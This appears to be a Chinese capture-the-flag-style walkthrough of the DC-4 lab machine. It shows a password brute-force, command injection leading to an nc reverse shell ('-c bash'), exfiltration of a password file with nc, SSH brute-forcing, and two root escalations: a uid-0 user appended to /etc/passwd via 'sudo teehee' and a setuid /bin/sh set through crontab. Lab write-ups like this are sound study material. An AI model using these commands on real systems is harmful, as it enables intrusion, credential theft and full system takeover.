9.100个渗透测试实战#9（DC-4）

       -a    显示详细信息

           -i   指定出口网卡

           -r   指定待扫描网段

           --localnet or -l    指定扫描本地网络 

           -sP   ping扫描且不扫描端口

            -p-      扫描全端口

            -sV     扫描端口的服务信息

            -O/A   扫描靶机的运行的操作系统信息

            如下图所示，就两个目录：css和images

          如下图所示，这个是admin管理员用户后台登录页面，f12也无可用信息

            如下图所示，破解出密码为happy

           如下图所示，登录成功，发现了命令执行漏洞；

           如下图所示，发现了空格被+代替

           如下图所示，发现了三个可疑用户

              把+替换成空白得：nc+-nv+192.168.97.129+8443+-c+bash

          如下图所示，当前用户是www-data

                 在debian/ubuntu上，www-data是默认运行web服务的用户/组，一般在通过apt安装web服务程序时生成。搭建web服                     务的文件夹/文件一般要设置成www-data的

          发现，只有jim的家目录下有三个文件：

               backups目录，其他人可读可执行

               mbox文件，其他人无任何权限

               test.sh文件，其他人可读可写可执行权限

            如下图所示，发现了一个旧密码字典；

           //我竟然看不懂。。。。。。。。

          kali：nc -lp 1234 > old-passwords.bak

          shell：nc -nv 192.168.97.129 1234 < old-passwords.bak

         -l     小写的l，后紧跟用户名

         -P   大写的P，后紧跟密码字典

         ssh://   ssh服务

         -s    指定端口

       如下图所示，login:jim  password:jibril04

         如下图所示，登录成功

        如下图所示，发现是一个mail

          如下图所示，发现了Charles的密码^xHhA&hvim0y（注意：由于是信的署名，字母首字母才是大写，所以用户名是                      charles）

        密码：^xHhA&hvim0y

         如下图所示，发现了可以用root身份空密码使用/usr/bin/teehee命令

第一种方法：向/etc/passwd里面直接写入一个用户，uid写为0，gid写为0

         如下图所示，/etc/passwd里存储的内容如下：用户名+密码+uid+gid+描述+家目录+/bin/bash

         echo "teehee::0:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

              |  管道符，把前面一个命令的输出当作后一个命令的输入进行其操作

              -a, --append              append to the given FILEs, do not overwrite（追加到给定文件，不覆盖）

           如下图所示，成功写入了用户teehee，且uid和gid为0，shell为/bin/bash，就有了root权限了

第二种提权方法：向/etc/crontab文件中写入新的定时任务，通过定时任务执行脚本提权

        时间部分全部填写为*，这样默认这个定时任务每分钟执行一次，可以根据情况自行设定。通过执行的脚本将/bin/sh的权限            修改为4777，这样就可以在非root用户下执行它，并且执行期间拥有root权限

实战 渗透测试 测试 dc